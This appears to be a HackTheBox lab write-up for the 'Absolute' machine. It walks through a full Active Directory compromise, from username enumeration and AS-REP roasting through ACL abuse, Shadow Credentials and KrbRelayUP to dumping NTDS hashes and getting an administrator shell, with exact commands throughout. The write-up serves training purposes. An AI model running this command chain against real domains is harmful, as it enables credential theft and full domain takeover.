HackTheBox — Absolute

16 min readMay 27, 2023

Absolute involved extracting usernames from image’s meta data, using a tool named anarchy to generate pattern for generating usernames, using kerbrute to find valid usernames, we’ll get a user d.klay who has pre-authentication disabled leading to AS-REP roasting, cracking the hash the credentials won’t work as NTLM auth is disabled, generating a TGT will give us access to LDAP ,through which we can get svc_smb’s password from the user’s description, with this user Shared SMB share can be accessed, having compiler.sh and test.exe , from wireshark traffic can be analyzed for the exe that it’s authenticating on ldap with m.lovegod’s credentials, with this account we can enumerate the domain through python-bloodhound , showing that we can get winrm_user by abusing GenericWrite to perform a technique called Shadow Credentials , with this account we can get a session through WinRM, running winpeas reveals that this machine is vulnerable to KrbRelayUP giving us access to administrator user.

NMAP

Nmap scan report for 10.10.11.181                                                                                                    
Host is up (0.11s latency).                                            
Not shown: 65508 closed ports                                                                                                                 
PORT      STATE SERVICE       VERSION                                
53/tcp    open  domain?                                                
| fingerprint-strings:    
|   DNSVersionBindReqTCP:                                              
|     version                                                          
|_    bind                                                             
80/tcp    open  http          Microsoft IIS httpd 10.0                 
| http-methods:                                                        
|   Supported Methods: OPTIONS TRACE GET HEAD POST                 
|_  Potentially risky methods: TRACE                                                                                                          
|_http-server-header: Microsoft-IIS/10.0                                                                                                      
|_http-title: Absolute                                                                                                                        
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-09-25 02:06:22Z)
135/tcp   open  msrpc         Microsoft Windows RPC                    
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA 
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-06-09T08:14:24
| Not valid after:  2023-06-09T08:14:24
| MD5:   bfc0 67ac a80d 4a43 c767 70e3 daac 4089
|_SHA-1: d202 0dbd 811c 7e36 ad9e 120b e6eb a110 8695 f3f7
|_ssl-date: 2022-09-25T02:08:58+00:00; +7h00m00s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA 
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA 
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-06-09T08:14:24
| Not valid after:  2023-06-09T08:14:24
| MD5:   bfc0 67ac a80d 4a43 c767 70e3 daac 4089
|_SHA-1: d202 0dbd 811c 7e36 ad9e 120b e6eb a110 8695 f3f7
|_ssl-date: 2022-09-25T02:08:58+00:00; +7h00m00s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA 
| Public Key type: rsa
| Public Key bits: 2048
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
49704/tcp open  msrpc         Microsoft Windows RPC
54894/tcp open  msrpc         Microsoft Windows RPC

PORT 445 (SMB)

Checking for anonymous login for smb share but it doesn’t list any shares

PORT 80 (HTTP)

The site only shows a static page with nothing to interact it, so fuzzing for files and directories with gobuster

So now fuzzing for subdomain or vhost with wfuzz

This didn’t find anything, going back to the site, we can see that there are some images which doesn’t show anything meaningful but if check the exif data it does reveal usernames

We can try grabbing the usernames from all images using exiftool with oneliner

exiftool *.jpg | grep Author | awk {'print $3,$4'}

We have usernames but we need to figure out which format is used for usernames on the domain like the username could be in format of firstname.lastname, first initial.lastname and so on for that I used a tool called Username Anarchy

username-anarchy -i ./names.txt -f firstlast,first.last

Foothold (d.klay)

Now that have the usernames in format, we can use kerbrute to see which usernames exist in domain if we have generated the names in a proper format

kerbrute userenum ./generated_names.txt -d absolute.htb --dc 10.10.11.181

From the output we can see kerbrute tried to authenticate and it found d.klay doesn't have pre-authentication enabled which led to AS-REP roasting, before we go cracking this hash, hashcat doesn't support cracking etype 18 so we need to use impacket's GetNPUsers

python3 GetNPUsers.py absolute.htb/uwu@dc.absolute.htb -
erated_names.txt -request

This hash can now be cracked with hashcat as it supports etype 23

hashcat -a 0 -m 18200 ./hash.txt /opt/SecLists/Passwords/rockyou.txt --force

I tried using the credentials on rpc and smb but got an account restriction error

Credentials didn’t worked on ldap as well, I tried password spraying which should that none of the valid usernames are allowed on smb

So this could mean that NTLM authentication is disabled, let’s try using kerberos based authentication and for that we’ll need d.klay’s TGT with getTGT from impacket script

python3 getTGT.py absolute.htb/d.klay

Now using smbclient.py from impacket we can perform kerberos authentication to list shares

python3 smbclient.py absolute.htb/d.klay@dc.absolute.htb -k -no-pass -debug

But it shows a clock skew error which means that we need to synchronize our time with domain controller

sudo ntpdate 10.10.11.181

The only shares that were accessible by this user were NETLOGON and SYSVOL which doesn't seem to have anything interesting, logging in through rpcclient with kerberos auth by setting up krb5.conf

[libdefaults] default_realm = ABSOLUTE.HTB

[realms]
        ABSOLUTE.HTB = {
                kdc = 10.10.11.181
        }

We can get more users through enumdomusers

rpcclient -U absolute.htb/d.klay dc.absolute.htb -k

I checked if there wasn’t pre-auth flag set on the new users we got

Privilege Escalation (svc_smb)

Which wasn’t the case, I decided to go back and check ldap through kerberos auth and needed to update cme as it was giving an error on ldap

Now checking if we can access ldap

poetry run crackmapexec ldap 10.10.11.181 -k --kdcHost dc.absolute.htb --user

We have the password for svc_smb user which is AbsoluteSMBService123!, we need to generate TGT again for this user to access smb and see which shares we can access now

Listing shares with cme we can see that this user can acess Shared

From shared, we see two files

From compile.sh it seems that it's compiled in nim

Running the exe on windows machine, it doesn’t show any output

Adding host name in c:\windows\system32\drivers\etc\hosts

Privilege Escalation (m.lovegod)

After adding the hostname, if we check wireshark after running the exe, we’ll see that it’s try to connect to LDAP using credentials

On opening the packet, we’ll get the password for m.lovegod which is AbsoluteLDAP2022!

This user didn’t gave us any special access, seeing a tweet from JazzPizazz during the box release, he modified python bloodhound to work with kerberos authentication

python3 bloodhound.py -u m.lovegod -k -d absolute.htb -dc dc.absolute.htb  -no-pass -c
 all -ns 10.10.11.181

This worked and we have domain data which we can import it on bloodhound

Checking in which group is m.lovegod part of

Here we see that he is a member of three groups where Networkers looks like a custom group, if we enumerate this group

It has WriteOwner permissions on Network Audit object, further looking into that group it has GenericWrite on winrm_user

So the path we need to follow is, m.lovegod is a part of networkers group and has WriteOwner ACL, we can become owner of that group,and grant permissions to add members in Network Audit group and then we can add a SPN to winrm_user and then kerberoast it which is known as targeted kerberoasting.

But the problem is we don’t have a shell and for doing that we need powerview or ADModule so I tried powerview.py and ldap_shell but they didn’t worked but ldapsearch was working and we see key credential property which we abuse as well

ldapsearch -LLL -Y GSSAPI -H ldap://dc.absolute.htb -b "dc=absolute,dc=htb"

I saw a tweet from Shutdown sharing a branch of impacket through which we can abuse WriteOwner and WriteDACL absue

Further digging into it, I found a resource for abusing WriteOwner using the author’s script

But this script isn’t merged with the current impacket repo, so we need to create a python virtual environment and install impacket so that it doesn’t mess up with the current impacket installed

Having the pthon virtual environment created clone the repo

git clone --branch dacledit https://github.com/ShutdownRepo/impacket.git

Copy the owneredit.py by from owneredit branch and install impacket

Once it’s installed with owneredit we are going to make m.lovegod the owner of network audit group

python3 ./owneredit.py -action write -target 'NETWORK AUDIT' -new-owner 'm.lovegod' 'absolute.htb'/'m.lovegod' -k -no-pass -dc-ip 10.10.11.181

Privilege Escalation (winrm_user)

Now being the owner of aduit group we can give full control to m.lovegod to do anything with the group like adding group members so that m.lovegod can have generic write on win_rm user

python3 dacledit.py -action 'write' -rights 'FullControl' -principal 'm.lovegod' -target 'NETWORK AUDIT' 'absolute.htb'/'m.lovegod' -k -no-pass -dc-ip 10.10.11.181

All that is left is to add m.lovegod to audit group with net rpc

net rpc group addmem 'Network Audit' 'm.lovegod' -U absolute.htb/m.lovegod -S dc.absolute.htb -k

We need to get the TGT again as the permissions or configurations will be revoked

With targeted kerberoasting we can add SPN to winrm_user and request for a TGS

python3 ./targetedKerberoast.py -d absolute.htb  -u m.lovegod --dc-ip 10.10.11.181 -k --no-pass -v

But this hash was not crackable, All this could be done with windows as well machine, first synchronie time with DC, we can do it with w32tm but we do need to start the service

net start w32time
w32tm /config /manualpeerlist:dc.absolute.htb /syncfromflags:MANUAL /reliable:yes /update

Now having synchronized with the domain controller we can use PowerView but for that we needed to make some configurations in host file and the openvpn adapter because without that it won't work properly and will show this

$SecPassword = ConvertTo-SecureString 'AbsoluteLDAP2022!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)

So to make this work we need to add the domain controller’s IP as the DNS server in openvpn adapter’s settings

Make sure dc.absolute.htb isn’t in the hosts file

And now our powerview commands will work

Since I am on a windows machine and I had previously made m.lovegod the owner of network audit group but I did that on linux and a day was passed since I had done that so chances are that might have been revoked so I’ll just do that powerview

Set-DomainObjectOwner -Credential $Cred -Identity "NETWORK AUDIT" -OwnerIdentity "m.lovegod" -Domain 'absolute.htb'-DomainController dc.absolute.htb -V

Now giving him the full control again

Add-DomainObjectAcl -TargetIdentity "NETWORK AUDIT" -PrincipalIdentity m.lovegod -Rights All -Verbose -Credential $Cred -Domain 'absolute.htb'

Now adding m.lovegod in network audit’s group so that we can abuse generic write by doing targeted kerberoasting

Add-DomainGroupMember -Identity 'NETWORK AUDIT' -Members 'm.lovegod' -Domain 'absolute.htb' -Credential $Cred -Verbose

We can verfiy if m.lovegod is added in the group

Now when setting the SPN for winrm_user, it wasn’t working probably because of clean up script doing their job but not really sure why it didn’t worked as I was providing the command one after the other

Set-DomainObject -Identity 'winrm_user' -Set @{serviceprincipalname='MSSQL/UwU'} -Domain 'absolute.htb' -DomainController dc.absolute.htb -Credential $Cred -Verbose

So what we can do is, repeat the same process by making m.lovegod the owner of audit group, give full control, add m.lovegod into the audit group and then generate TGT, this will retain the configurations or the session regardless of what we have configured being removed

Checking if the ticket has been loaded

But targeted kerborasting wasn’t the way, since there’s GenericWrite on winrm_user we can update msDS-KeyCredentialLink allowing us to perform Shadow Credentials using PyWhisker

python3 ./pywhisker.py -a add --dc-ip 10.10.11.181 -d absolute.htb -u 'm.lovegod' -k --no-pass -t winrm_user

Following PKINIT tools we can request for a TGT and then with that we can get the NTHash but for that we need to have minikerberos installed

python3 ./gettgtpkinit.py -cert-pfx ../pywhisker/luUEOlxx.pfx -pfx-pass p9nq1oiCzfgRbOWKMZWQ absolute.htb/winrm_user winrm_user.ccache

Export the TGT ticket

python3 ./getnthash.py -key 1b9d937e95c70cc1dd37ad5c67be8d6ff7617fb8438d012236e0f4b3e1cb1e91 absolute.htb/winrm_user

This can also be doing through rubeus by transferring the pfx file and asking for a TGT with the NTHash

Rubeus.exe asktgt /user:winrm_user /certificate:luUEOlxx.pfx /password:p9nq1oiCzfgRbOWKMZWQ /domain:absolute.htb /domaincontroller:dc.absolute.htb /getcredentials /show

We can’t really do much with the NThash but TGT can be helpful, we can use that on WinRM to get a shell for that I found a ruby script which works with kerberos for winrm

After cloning the repo I again ran into a problem

winrm_kerb_shell.rb -s dc.absolute.htb -r ABSOLUTE.HTB

This can be resolved by following this which tells to add the domain name in capital in the hosts file

Now the script works perfectly

After authenticating with winrm service this will save the service principal for winrm and we can use evil-winrm

evil-winrm -i dc.absolute.htb -r ABSOLUTE.HTB

We can run winpeas on the machine since defender is disabled and on running we’ll see that it shows system is vulnerable to krbrealyUP

We can abuse this by following this post, to compile krblreayup we need to use VS studio, after compiling we can transfer the executable on the target machine

By following the blog post we can abuse shadow credentials through Krbrelayup, on running that it wasn’t working so probably we need other cls ID

We can check for different clsids from here

Privilege Escalation (Administrator)

This time we get an access denied so we have gotten the clsid correct but it isn’t accessible so probably we’ll need a different user to run this exe with like m.lovegod. But issue was running exe with a different user was pain as I tried Invoke-Command and some Runas scripts which didn’t worked but the one which did work was RunasCS

RunasCs.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb 'C:\Users\winrm_user\Documents\KrbRelayUp.exe full -m shadowcred --ForceShadowCred -cls 3c6859ce-230b-48a4-be6c-932c0c202048' -l 9

Now using Rubeus to get TGT for DC$ machine account with the generated certificate

.\Rubeus.exe asktgt /user:DC$ /certificate:cert /password:password /enctype:AES256 /nowra

Having the ticket we can now impersonate as the administrator user with a S4U

.\Rubeus.exe s4u /self /user:DC$ /impersonateuser:administrator /msdsspn:host/dc.absolute.htb /ticket:kirbi_ticket

Converting the administrator’s .kirbi ticket to ccache so that we can use it with impacket scripts

echo "kirbiticket" | base64 -d > kirbiticket.kirb

Converting it into ccache ticket with ticketconverter

ticketConverter.py kirbiticket.kirbi ticket.ccache

Having the administrator’s TGT we can dump the SAM and NTDS.dit hashes

secretsdump.py absolute.htb/administrator@dc.absolute.htb -k -no-pass

And now we can use any of the execs from impacket, I used psexec to get a shell

psexec.py -k -no-pass absolute.htb/administrator@dc.absolute.htb